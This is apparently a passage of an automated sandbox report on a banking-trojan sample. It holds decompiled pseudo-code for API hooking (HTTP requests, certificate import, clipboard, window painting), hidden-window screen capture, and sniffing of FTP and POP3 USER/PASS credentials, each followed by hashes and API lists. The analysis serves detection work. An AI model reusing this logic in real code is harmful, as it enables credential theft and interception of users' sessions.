        					_push(0xe);
        					_push(_t133);
        					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
        						goto L33;
        					}
        					while(1) {
        						_t69 = _v28;
        						_t126 =  &_v8;
        						_push( &_v8);
        						_push(_t69);
        						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
        							break;
        						}
        						_t71 = _v8;
        						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
        						__eflags = _t72;
        						if(_t72 == 0) {
        							__eflags = _v16 - _t114;
        							if(_v16 != _t114) {
        								_t75 = _v8;
        								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
        								__eflags = _t76;
        								if(_t76 == 0) {
        									__eflags =  &_v388 | 0xffffffff;
        									_v24 = E0040C402( &_v388 | 0xffffffff, _t114,  &_v388);
        								} else {
        									_v24 = _t114;
        								}
        								_t80 = _v8;
        								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
        								__eflags = _t81;
        								if(_t81 == 0) {
        									__eflags =  &_v644 | 0xffffffff;
        									_t132 = E0040C402( &_v644 | 0xffffffff, _t114,  &_v644);
        								} else {
        									_t132 = 0;
        								}
        								_t85 = 0x4a;
        								E004128DB(_t85,  &_v132);
        								_t87 = 0x4019b0;
        								_t130 = 0x4019b0;
        								__eflags = _t132 - _t114;
        								if(_t132 != _t114) {
        									_t130 = _t132;
        								}
        								_t122 = _v24;
        								_t136 = _v12;
        								__eflags = _t122 - _t114;
        								_t123 =  ==  ? _t87 : _t122;
        								__eflags = _t136 - _t114;
        								if(_t136 != _t114) {
        									__eflags =  *_t136 - _t114;
        									if( *_t136 != _t114) {
        										_t87 = 0x404b2c;
        									}
        								}
        								_push(_t130);
        								_push(_t123);
        								_t91 = E0040CF43( &_v12, E0040CD11(_t136), _t136, __eflags,  &_v132, _t87);
        								_t141 = _t141 + 0x10;
        								E0040C1C2(_v24);
        								E0040C1C2(_t132);
        								__eflags = _t91 - 0xffffffff;
        								if(_t91 == 0xffffffff) {
        									_t30 =  &_v16;
        									 *_t30 = _v16 & 0x00000000;
        									__eflags =  *_t30;
        								}
        								__eflags = _v16 & 0x00000002;
        								if((_v16 & 0x00000002) != 0) {
        									_t106 = 0x53;
        									E004128DB(_t106,  &_v68);
        									E0041788D(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
        								}
        								__eflags = _v16 & 0x00000004;
        								if((_v16 & 0x00000004) != 0) {
        									_t100 = 0x52;
        									E004128DB(_t100,  &_v56);
        									E0041788D(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
        								}
        								__eflags = _v16 & 0x00000008;
        								if((_v16 & 0x00000008) != 0) {
        									_t94 = 0x51;
        									E004128DB(_t94,  &_v44);
        									E0041788D(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
        								}
        								_t133 = _v20;
        								_t114 = 0;
        								__eflags = 0;
        							}
        						}
        						_t73 = _v8;
        						 *((intOrPtr*)( *_t73 + 8))(_t73);
        					}
        					_t112 = _v28;
        					 *((intOrPtr*)( *_t112 + 8))(_t112);
        					goto L33;
        				}
        				_t133 = _v32;
        				if(_t133 == 0) {
        					goto L3;
        				} else {
        					_v20 = _t133;
        					goto L4;
        				}
        			}












































        APIs
        • CoCreateInstance.OLE32(00404ABC,00000000,00004401,00404ACC,?,?,00000000,00000001), ref: 004179F2
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: e9231f990a0d38528c8f63471a491936886547dabb3515d3d0916d53daded057
        • Instruction ID: 8ffe14049b0c5047ac1320087e785ef065bdfe1f7accef1795f4c23a7f8bf0c6
        • Opcode Fuzzy Hash: e9231f990a0d38528c8f63471a491936886547dabb3515d3d0916d53daded057
        • Instruction Fuzzy Hash: 1E61A071A44219AFDB10DBA4CC84EEFBBB8EF44344F14456AFA11F7281D7789E808B54
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E00414047(intOrPtr _a4) {
        				char _v262;
        				char _v276;
        				signed char _v277;
        				signed char _v278;
        				signed int _v279;
        				void* __esi;
        				signed int _t16;
        				void* _t25;
        				void* _t26;
        				void* _t34;
        				signed char _t38;
        				void* _t39;
        
        				_t40 = _a4;
        				_t12 =  &_v262;
        				__imp__#16(_a4, _t12, 1, 0, _t34, _t39, _t26);
        				if(_t12 == 1) {
        					_t16 = _v278 & 0x000000ff;
        					if(_t16 == 0) {
        						_t12 = E0040F175(1, _t40,  &_v277, 0);
        						__eflags = _t12;
        						if(_t12 != 0) {
        							_t12 = E0040F175(1, _t40,  &_v279, 0);
        							__eflags = _t12;
        							if(_t12 != 0) {
        								__eflags = _v279;
        								if(_v279 > 0) {
        									_t12 = E0040F175(_v279 & 0x000000ff, _t40,  &_v276, 0);
        									__eflags = _t12;
        									if(_t12 != 0) {
        										_t38 = E0040C402(_v279 & 0x000000ff, 0xfde9,  &_v276);
        										__eflags = _t38;
        										if(_t38 != 0) {
        											E0040C0B2(_t40, _t38, _v277 & 0x000000ff);
        											_t12 = E0040C1C2(_t38);
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t25 = _t16 - 4;
        						if(_t25 == 0) {
        							_t12 = E0041C01D(__eflags, _t40);
        						} else {
        							_t12 = _t25 == 1;
        							_t48 = _t25 == 1;
        							if(_t25 == 1) {
        								_t12 = E0041B6D6(_t48, _t40);
        							}
        						}
        					}
        				}
        				E0040F565(_t12, _t40);
        				return 0;
        			}
















        APIs
        • recv.WS2_32(?,?,00000001,00000000), ref: 00414066
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: recv
        • String ID:
        • API String ID: 1507349165-0
        • Opcode ID: 167cebee79af97f04047f2083a64877ce5c996b7aa2fb2916f637e7ed6806fdf
        • Instruction ID: dfa7a26171523ffcae46a5f64800978abd722848b1ec65008e99a206eea8d369
        • Opcode Fuzzy Hash: 167cebee79af97f04047f2083a64877ce5c996b7aa2fb2916f637e7ed6806fdf
        • Instruction Fuzzy Hash: 4A1127B21482617A8621EAAA4CC5CFF769E4ED6318F08043FF581D7181D92CCDC9866F
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 37%
        			E0040994D(signed short* __eax, void* __ecx) {
        				signed int _v8;
        				void* __esi;
        				signed int* _t7;
        				void* _t8;
        				signed short* _t9;
        				signed int _t10;
        				signed int _t13;
        				signed short _t14;
        				void* _t15;
        
        				_t16 = __eax;
        				_t7 =  &_v8;
        				_v8 = 0x104;
        				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
        				if(_t7 == 0) {
        					L8:
        					_t8 = 6;
        					_t9 = E004128DB(_t8, _t16);
        				} else {
        					_t10 = _v8;
        					if(_t10 == 0) {
        						goto L8;
        					} else {
        						 *((short*)(__eax + _t10 * 2)) = 0;
        						_t9 = __eax;
        						if( *((intOrPtr*)(__eax)) != 0) {
        							do {
        								_t13 =  *_t9 & 0x0000ffff;
        								if(_t13 == 0x2f || _t13 == 0x5c) {
        									_t14 = 0x7c;
        									 *_t9 = _t14;
        								}
        								_t9 =  &(_t9[1]);
        							} while ( *_t9 != 0);
        						}
        					}
        				}
        				return _t9;
        			}













        APIs
        • GetUserNameExW.SECUR32(00000002,?,?), ref: 00409962
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: NameUser
        • String ID:
        • API String ID: 2645101109-0
        • Opcode ID: da8e6736aca2f2070ccf50143c679bd0048df104ab54c46bccaec459d7b7cce1
        • Instruction ID: 4bc8c11d7991164f51256c01b97e6abb39ad0d8046086a2cb47a20b82d78e005
        • Opcode Fuzzy Hash: da8e6736aca2f2070ccf50143c679bd0048df104ab54c46bccaec459d7b7cce1
        • Instruction Fuzzy Hash: 08F0F6A1614200AADB345B58D802AAB73A8DF05750F14006FE445EB3D1E2B88D80C359
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 66%
        			E0041D43B() {
        				void* __ebx;
        				char _t1;
        				signed int _t55;
        				void* _t57;
        				void* _t58;
        
        				_t1 =  *0x4238c4;
        				if(_t1 == 0) {
        					_t1 =  *0x4238c0;
        					 *0x42200c = E00414453;
        				} else {
        					 *0x42200c = E0041450A;
        				}
        				E00422008 = _t1;
        				 *0x422018 =  *0x4238d0;
        				 *0x422028 = GetFileAttributesExW;
        				 *0x422038 = HttpSendRequestW;
        				 *0x422048 = HttpSendRequestA;
        				 *0x422058 = HttpSendRequestExW;
        				 *0x422068 = HttpSendRequestExA;
        				 *0x422078 = InternetCloseHandle;
        				 *0x422088 = InternetReadFile;
        				 *0x422098 = __imp__InternetReadFileExA;
        				 *0x4220a8 = InternetQueryDataAvailable;
        				 *0x4220b8 = HttpQueryInfoA;
        				 *0x4220c8 = __imp__#3;
        				 *0x4220d8 = __imp__#19;
        				 *0x4220e8 = __imp__WSASend;
        				 *0x4220f8 = OpenInputDesktop;
        				 *0x422108 = SwitchDesktop;
        				 *0x422118 = DefWindowProcW;
        				 *0x422128 = DefWindowProcA;
        				 *0x422138 = DefDlgProcW;
        				 *0x422148 = DefDlgProcA;
        				 *0x422158 = DefFrameProcW;
        				 *0x422168 = DefFrameProcA;
        				 *0x422178 = DefMDIChildProcW;
        				 *0x422188 = DefMDIChildProcA;
        				 *0x422198 = CallWindowProcW;
        				 *0x4221a8 = CallWindowProcA;
        				 *0x4221b8 = RegisterClassW;
        				 *0x4221c8 = RegisterClassA;
        				 *0x4221d8 = RegisterClassExW;
        				 *0x4221e8 = RegisterClassExA;
        				 *0x4221f8 = BeginPaint;
        				 *0x422208 = EndPaint;
        				 *0x422218 = GetDCEx;
        				 *0x422228 = GetDC;
        				 *0x422238 = GetWindowDC;
        				 *0x422248 = ReleaseDC;
        				 *0x422258 = GetUpdateRect;
        				 *0x422268 = GetUpdateRgn;
        				 *0x422278 = GetMessagePos;
        				 *0x422288 = GetCursorPos;
        				 *0x422298 = SetCursorPos;
        				 *0x4222a8 = SetCapture;
        				 *0x4222b8 = ReleaseCapture;
        				 *0x4222c8 = GetCapture;
        				 *0x4222d8 = GetMessageW;
        				 *0x4222e8 = GetMessageA;
        				 *0x4222f8 = PeekMessageW;
        				 *0x422308 = PeekMessageA;
        				 *0x422318 = TranslateMessage;
        				_push( &E00422008);
        				 *0x422328 = GetClipboardData;
        				_t55 = 0x34;
        				 *0x422338 = __imp__PFXImportCertStore;
        				return E0041D3AA(_t55, _t57, _t58);
        			}

        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 57aea5d502814d75d73c88a5753f460b1f3e871a90cf862b9f014f08a68f59fe
        • Instruction ID: 86a7ab6c9b463e2ab16bc7b9f912e4fa8c8d04fd609e19a462f16b9ebbf6115f
        • Opcode Fuzzy Hash: 57aea5d502814d75d73c88a5753f460b1f3e871a90cf862b9f014f08a68f59fe
        • Instruction Fuzzy Hash: C161CDB8A00241EFD3A0CF68FEC0A5177E0B3487547E1417AE918E7731E2B5A996DB1D
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
        • Instruction ID: d74da45686cf666c48bd23fce6d1f5c88108d18a63310ac2dc556d4b474febc0
        • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
        • Instruction Fuzzy Hash: C7E0267B3000108BC750CE15E580983B7A2FBCC730B1282A5C815C7305C938EDC3C5D5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E0040A496(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
        				char _v9;
        				signed int _v10;
        				int _v16;
        				int _v20;
        				int _v24;
        				int _v28;
        				int _v32;
        				struct tagRECT _v48;
        				struct tagRECT _v64;
        				void* _v68;
        				signed int _v72;
        				int _v76;
        				intOrPtr _v80;
        				intOrPtr _v84;
        				int _v88;
        				int _v92;
        				struct HDC__* _v96;
        				struct HWND__* _v100;
        				void _v104;
        				intOrPtr _v140;
        				intOrPtr _v156;
        				struct tagWINDOWINFO _v164;
        				signed int _t128;
        				signed int _t135;
        				void* _t140;
        				void* _t146;
        				signed int _t164;
        				intOrPtr _t191;
        				long _t192;
        				intOrPtr _t195;
        				long _t196;
        				long _t210;
        				long _t211;
        				long _t212;
        				long _t213;
        				signed int _t214;
        				signed int _t215;
        				RECT* _t216;
        				struct HDC__* _t217;
        				struct HDC__* _t221;
        
        				_t214 = __edx;
        				_t216 = __eax;
        				_t128 = E00416709(_a8) & 0x0000ffff;
        				_v16 = _t128;
        				if((_t128 & 0x00000001) == 0) {
        					if(_t128 == 0) {
        						_v16 = 2;
        						_t128 = _v16;
        					}
        					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
        						_v16 = _t128 & 0x0000fffd | 0x00000008;
        					}
        					_v24 = 0;
        					_v20 = 0;
        					_v28 = 0;
        					_v32 = 0;
        					_v164.cbSize = 0x3c;
        					if(GetWindowInfo(_a8,  &_v164) != 0) {
        						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
        						_v10 = _t215;
        						if(_t215 != 0) {
        							_t212 = _t216->top;
        							_t195 = _v156;
        							if(_t195 < _t212) {
        								_v20 = _t195 - _t212;
        							}
        							_t213 = _t216->left;
        							_t196 = _v164.rcWindow.left;
        							if(_t196 < _t213) {
        								_v24 = _t196 - _t213;
        							}
        						}
        						_t135 = _v16 & 0x00000002;
        						_v72 = _t135;
        						if(_t135 == 0) {
        							_a15 = _t215;
        						} else {
        							if((_v164.dwStyle & 0x20000000) == 0) {
        								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
        								if(_a15 != 0) {
        									_t210 = _t216->top;
        									_t191 = _v140;
        									if(_t191 < _t210) {
        										_v32 = _t191 - _t210;
        									}
        									_t211 = _t216->left;
        									_t192 = _v164.rcClient.left;
        									if(_t192 < _t211) {
        										_v28 = _t192 - _t211;
        									}
        								}
        							} else {
        								_a15 = 0;
        							}
        						}
        						if(_v10 != 0 || _a15 != 0) {
        							_t217 = GetDC(0);
        							if(_t217 == 0) {
        								goto L8;
        							}
        							_t221 = CreateCompatibleDC(_t217);
        							ReleaseDC(0, _t217);
        							if(_t221 == 0) {
        								goto L8;
        							}
        							_t218 = _a4;
        							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
        							_v68 = _t140;
        							if(_t140 != 0) {
        								_v9 = 1;
        								if(_v72 == 0) {
        									if((_v16 & 0x00000004) == 0) {
        										if((_v16 & 0x00000008) == 0) {
        											L56:
        											SelectObject(_t221, _v68);
        											DeleteDC(_t221);
        											return _v9;
        										}
        										if(_v24 != 0 || _v20 != 0) {
        											SetViewportOrgEx(_t221, _v24, _v20, 0);
        										}
        										_t146 = E0040A3B4(_t218,  &_v64, 0);
        										__imp__PrintWindow(_a8, _t221, 0);
        										if(_t146 != 0) {
        											L55:
        											E0040A3B4(_t218,  &_v64, 1);
        										} else {
        											_v9 = 0;
        										}
        										goto L56;
        									}
        									if(_v24 != 0 || _v20 != 0) {
        										SetViewportOrgEx(_t221, _v24, _v20, 0);
        									}
        									E0040A3B4(_t218,  &_v64, 0);
        									DefWindowProcW(_a8, 0x317, _t221, 0xe);
        									goto L55;
        								}
        								_v100 = _a8;
        								_v96 = _t221;
        								_v84 = _v48.right - _v48.left;
        								_v76 = 1;
        								_v80 = _v48.bottom - _v48.top;
        								_v92 = 0;
        								_v88 = 0;
        								TlsSetValue( *0x423e84,  &_v104);
        								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
        									_v16 = SaveDC(_t221);
        									if(_v24 != 0 || _v20 != 0) {
        										SetViewportOrgEx(_t221, _v24, _v20, 0);
        									}
        									E0040A3B4(_a4,  &_v64, 0);
        									_v104 = 0;
        									SendMessageW(_a8, 0x85, 1, 0);
        									if(_v104 == 0) {
        										DefWindowProcW(_a8, 0x317, _t221, 2);
        									}
        									E0040A3B4(_a4,  &_v64, 1);
        									RestoreDC(_t221, _v16);
        								}
        								if(_a15 != 1) {
        									L49:
        									TlsSetValue( *0x423e84, 0);
        									goto L56;
        								} else {
        									if(_v28 != 0) {
        										L41:
        										_a15 = 1;
        										L42:
        										_v16 = SaveDC(_t221);
        										if(_a15 != 0) {
        											SetViewportOrgEx(_t221, _v28, _v32, 0);
        										}
        										E0040A3B4(_a4,  &_v48, 0);
        										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
        										asm("sbb eax, eax");
        										_v76 =  ~_t164 + 1;
        										RestoreDC(_t221, _v16);
        										if(_a15 != 0) {
        											SetViewportOrgEx(_t221, _v28, _v32, 0);
        										}
        										_v104 = 0;
        										SendMessageW(_a8, 0xf, 0, 0);
        										if(_v104 == 0) {
        											DefWindowProcW(_a8, 0x317, _t221, 4);
        										}
        										E0040A3B4(_a4,  &_v48, 1);
        										goto L49;
        									}
        									_a15 = 0;
        									if(_v32 == 0) {
        										goto L42;
        									}
        									goto L41;
        								}
        							}
        							DeleteDC(_t221);
        							goto L8;
        						} else {
        							goto L1;
        						}
        					}
        					L8:
        					return 0;
        				}
        				L1:
        				return 1;
        			}

        APIs
          • Part of subcall function 00416709: GetClassNameW.USER32 ref: 00416724
        • GetWindowInfo.USER32 ref: 0040A502
        • SelectObject.GDI32(00000000,?), ref: 0040A7D1
        • DeleteDC.GDI32(00000000), ref: 0040A7D8
        • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040A800
        • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0040A816
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
        • String ID: <
        • API String ID: 3458064076-4251816714
        • Opcode ID: 5d7dc8d5aaed9a69c4d6063f18916d3bf0a4d0ea39f783a1c221537f07865be3
        • Instruction ID: 96616ccf789ac8e5f9cdfed5ca9373da9a56e589fe823fafd9d4f5e1208f42b9
        • Opcode Fuzzy Hash: 5d7dc8d5aaed9a69c4d6063f18916d3bf0a4d0ea39f783a1c221537f07865be3
        • Instruction Fuzzy Hash: F6C16D71D00249AFDF219FA4CD44AEEBBB9BF04304F04803AF955B72A0D7398A54DB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040962D(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
        				char _v536;
        				char _v652;
        				char _v664;
        				char _v696;
        				char _v700;
        				char _v701;
        				char _v708;
        				void* __esi;
        				char* _t35;
        				void* _t40;
        				char* _t43;
        				intOrPtr _t44;
        				void* _t47;
        				void* _t54;
        				void* _t56;
        				intOrPtr _t57;
        				signed int _t58;
        				signed int _t60;
        				void* _t61;
        				signed int* _t71;
        				intOrPtr _t73;
        				signed int _t75;
        				signed char _t76;
        				intOrPtr _t79;
        				signed int _t80;
        				intOrPtr _t83;
        				signed int* _t84;
        				intOrPtr _t85;
        				void* _t87;
        				char* _t92;
        				void* _t93;
        				intOrPtr* _t94;
        
        				_t80 = __edx;
        				_t87 = __eax;
        				_t71 = __ecx;
        				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
        					L51:
        					_t35 = 0;
        					__eflags = 0;
        				} else {
        					if(__eax <= 6) {
        						L24:
        						__eflags = _t87 - 1;
        						if(_t87 <= 1) {
        							goto L51;
        						} else {
        							EnterCriticalSection(0x422878);
        							_t83 = E00409525(_a4);
        							__eflags = _t83;
        							if(_t83 != 0) {
        								__eflags =  *((intOrPtr*)(_t83 + 4));
        								if( *((intOrPtr*)(_t83 + 4)) == 0) {
        									L48:
        									_push(0);
        									goto L49;
        								} else {
        									__eflags =  *((intOrPtr*)(_t83 + 8));
        									if( *((intOrPtr*)(_t83 + 8)) == 0) {
        										goto L48;
        									} else {
        										__eflags = _t87 - 3;
        										if(_t87 < 3) {
        											L33:
        											__eflags = _t87 - 4;
        											if(_t87 >= 4) {
        												_t75 =  *_t71 ^ 0x04000001;
        												__eflags = _t75 - 0x41505955;
        												if(_t75 == 0x41505955) {
        													goto L37;
        												} else {
        													__eflags = _t75 - 0x50414547;
        													if(_t75 == 0x50414547) {
        														goto L37;
        													} else {
        														__eflags = _t75 - 0x52534151;
        														if(_t75 != 0x52534151) {
        															__eflags = _t75 - 0x50415452;
        															if(_t75 == 0x50415452) {
        																L40:
        																_t76 = 0x65;
        																_push(0x15);
        																goto L41;
        															} else {
        																__eflags = _t75 - 0x5053494d;
        																if(_t75 == 0x5053494d) {
        																	goto L40;
        																}
        															}
        														} else {
        															goto L37;
        														}
        													}
        												}
        											}
        										} else {
        											_t58 =  *_t71;
        											__eflags = _t58 - 0x43;
        											if(_t58 == 0x43) {
        												L31:
        												__eflags = _t71[0] - 0x57;
        												if(_t71[0] != 0x57) {
        													goto L33;
        												} else {
        													__eflags = _t71[0] - 0x44;
        													if(_t71[0] == 0x44) {
        														L37:
        														_t76 = 0x64;
        														_push(0x14);
        														L41:
        														_pop(_t40);
        														E004128DB(_t40,  &_v696);
        														_t43 =  &_v652;
        														_v700 = 0x80;
        														__imp__#5(_a4, _t43,  &_v700);
        														__eflags = _t43;
        														if(_t43 == 0) {
        															_t78 =  &_v664;
        															_t44 = E0040F66C( &_v664);
        															__eflags = _t44;
        															if(_t44 == 0) {
        																__eflags = _t76 - 0x65;
        																if(_t76 == 0x65) {
        																	L46:
        																	E0040F623( &_v664, _t78,  &_v536);
        																	_t47 = 0x13;
        																	E004128DB(_t47,  &_v696);
        																	_push( &_v536);
        																	_push( *((intOrPtr*)(_t83 + 8)));
        																	_push( *((intOrPtr*)(_t83 + 4)));
        																	E00409404(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
        																} else {
        																	__eflags = _t76 - 0x64;
        																	if(_t76 == 0x64) {
        																		_t92 =  &_v696;
        																		_t54 = 0x16;
        																		E004128DB(_t54, _t92);
        																		_push( *((intOrPtr*)(_t83 + 4)));
        																		_t80 = _t80 | 0xffffffff;
        																		_t56 = 9;
        																		_t78 = _t92;
        																		_t57 = E0040CDD2(_t56, _t92, _t80);
        																		__eflags = _t57;
        																		if(_t57 != 0) {
        																			goto L46;
        																		}
        																	}
        																}
        															}
        														}
        														_push(0);
        														L49:
        														E004095C4(_t83);
        													} else {
        														goto L33;
        													}
        												}
        											} else {
        												__eflags = _t58 - 0x50;
        												if(_t58 != 0x50) {
        													goto L33;
        												} else {
        													goto L31;
        												}
        											}
        										}
        									}
        								}
        							}
        							_t73 = 0;
        							goto L23;
        						}
        					} else {
        						_t60 =  *__ecx ^ 0x04000001;
        						if(_t60 == 0x56455354 || _t60 == 0x57534151) {
        							if(_t71[1] != 0x20) {
        								goto L24;
        							} else {
        								_t61 = 0;
        								_t93 = _t87 + 0xfffffffb;
        								_t84 =  &(_t71[1]);
        								if(_t93 == 0) {
        									goto L51;
        								} else {
        									while(1) {
        										_t79 =  *((intOrPtr*)(_t61 + _t84));
        										if(_t79 == 0xd || _t79 == 0xa) {
        											break;
        										}
        										if(_t79 < 0x20) {
        											goto L51;
        										} else {
        											_t61 = _t61 + 1;
        											if(_t61 < _t93) {
        												continue;
        											} else {
        												break;
        											}
        										}
        										goto L52;
        									}
        									if(_t61 == 0 || _t61 == _t93) {
        										goto L51;
        									} else {
        										_t85 = E0040C402(_t61, 0xfde9, _t84);
        										if(_t85 == 0) {
        											goto L51;
        										} else {
        											_v701 = 0;
        											EnterCriticalSection(0x422878);
        											_t94 = E00409525(_a4);
        											if(_t94 != 0) {
        												L18:
        												__eflags =  *_t71 - 0x55;
        												_v701 = 1;
        												if( *_t71 != 0x55) {
        													E0040C1C2( *((intOrPtr*)(_t94 + 8)));
        													 *((intOrPtr*)(_t94 + 8)) = _t85;
        												} else {
        													E004095C4(_t94, 1);
        													 *((intOrPtr*)(_t94 + 4)) = _t85;
        												}
        												 *_t94 = _a4;
        											} else {
        												_t94 = E0040955E(_a4);
        												if(_t94 != 0) {
        													goto L18;
        												} else {
        													E0040C1C2(_t85);
        												}
        											}
        											_t73 = _v701;
        											L23:
        											LeaveCriticalSection(0x422878);
        											_t35 = _t73;
        										}
        									}
        								}
        							}
        						} else {
        							goto L24;
        						}
        					}
        				}
        				L52:
        				return _t35;
        			}

        APIs
        • EnterCriticalSection.KERNEL32(00422878,0000FDE9,?), ref: 004096E2
        • LeaveCriticalSection.KERNEL32(00422878,?,000000FF), ref: 0040973D
        • EnterCriticalSection.KERNEL32(00422878), ref: 00409758
        • #5.WS2_32 ref: 00409805
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Enter$Leave
        • String ID: $D$GEAP$MISP$QASR$QASW$RTAP$TSEV$U$UYPA$W
        • API String ID: 2801635615-3373209534
        • Opcode ID: 40ad841b13249b3664b07af2ad65c3cf11ef7f51ff53cc02fd81e998d00f7964
        • Instruction ID: b9e4a9309e5e94245bf626c80a04a04582ab43e1f3574ed63d1bbc542ddbd412
        • Opcode Fuzzy Hash: 40ad841b13249b3664b07af2ad65c3cf11ef7f51ff53cc02fd81e998d00f7964
        • Instruction Fuzzy Hash: A1513733524211AADF31AE258C817AB77909B42310F188A3BF994B73E3D73DCC81875A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00416770(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
        				char _v9;
        				struct HDC__* _v16;
        				char _v20;
        				short _v128;
        				void* _v138;
        				char _v616;
        				char _v1141;
        				char _v1400;
        				void* _t60;
        				long _t62;
        				void* _t66;
        				void* _t71;
        				void* _t75;
        				void* _t79;
        				void* _t80;
        				struct HDC__* _t82;
        				int _t85;
        				void* _t87;
        				signed char _t90;
        				void* _t92;
        				void* _t107;
        				struct HDC__* _t108;
        				void* _t109;
        				void* _t111;
        				void* _t112;
        				void* _t120;
        				void** _t124;
        
        				_t124 = __esi;
        				_t120 = __edx;
        				E0040C275(_t60, __esi, 0, 0x18c);
        				_t62 = TlsAlloc();
        				__esi[1] = _t62;
        				if(_t62 != 0xffffffff) {
        					E00413140(0x84889911,  &_v128, 0);
        					_t66 = RegisterWindowMessageW( &_v128);
        					__esi[2] = _t66;
        					__eflags = _t66;
        					if(_t66 == 0) {
        						goto L1;
        					}
        					E00413140(0x84889912,  &_v128, 1);
        					_t71 = CreateEventW(0x4238d8, 1, 0,  &_v128);
        					__esi[3] = _t71;
        					__eflags = _t71;
        					if(_t71 == 0) {
        						goto L1;
        					}
        					E00413140(0x18782822,  &_v128, 1);
        					_t75 = CreateMutexW(0x4238d8, 0,  &_v128);
        					__esi[5] = _t75;
        					__eflags = _t75;
        					if(_t75 == 0) {
        						goto L1;
        					}
        					E00413140(0x9878a222,  &_v128, 1);
        					_t79 = CreateFileMappingW(0, 0x4238d8, 4, 0, 0x3d09128,  &_v128);
        					 *__esi = _t79;
        					__eflags = _t79;
        					if(_t79 == 0) {
        						goto L1;
        					}
        					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
        					__eflags = _t80;
        					if(_t80 == 0) {
        						goto L1;
        					}
        					__esi[4] = _t80;
        					__esi[6] = _t80 + 0x128;
        					_v9 = 0;
        					_t82 = GetDC(0);
        					_v16 = _t82;
        					__eflags = _t82;
        					if(_t82 == 0) {
        						L22:
        						return _v9;
        					}
        					__esi[9] = 0;
        					__esi[0xa] = 0;
        					__esi[0xb] = GetDeviceCaps(_t82, 8);
        					_t85 = GetDeviceCaps(_v16, 0xa);
        					_t118 = __esi[0xb];
        					__esi[0xc] = _t85;
        					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
        					if(__eflags == 0) {
        						_t87 = 0;
        						__eflags = 0;
        					} else {
        						_t24 =  &(_t124[8]); // 0x423ea0
        						_t87 = E00412760(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
        					}
        					_t124[7] = _t87;
        					ReleaseDC(0, _v16);
        					__eflags = _t124[7];
        					if(_t124[7] != 0) {
        						_t119 = _v20;
        						_t90 =  *(_v20 + 0xe) >> 3;
        						_t124[0xe] = _t90;
